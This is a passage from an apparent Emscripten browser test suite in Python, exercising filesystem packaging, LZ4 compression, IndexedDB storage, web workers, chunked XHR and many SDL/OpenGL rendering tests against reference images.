self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
run_process([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc: -s LZ4=1 tells emcc to pass --lz4 to the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
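# Exercises the IDBStore library by running idbstore.c through a sequence of stages across fresh page loads.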
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2'] + self.get_async_args())
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'] + self.get_async_args())
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17', args=['-s', 'EXIT_RUNTIME=1'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
self.compile_btest(['sdl_gl_read.c', '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL=1', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
create_test_file('test_egl.c', self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
self.compile_btest(['-O2', 'test_egl.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1')
def _test_egl_width_height_base(self, *args):
create_test_file('test_egl_width_height.c', self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
self.compile_btest(['-O2', 'test_egl_width_height.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD=1')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def do_test_worker(self, args=[]):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20:' + ('data%20for%20w' if file_data else '') + ':')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception:
print('(sleep for server)')
time.sleep(1)
else:
raise Exception('the test server did not become ready in time')
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS=1'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
self.emcc_args += ['-Wno-pointer-sign', '-Wno-int-conversion']
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
run_process([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'EXIT_RUNTIME=1']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
  # Covered by the dEQP test suite (we can remove this test later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
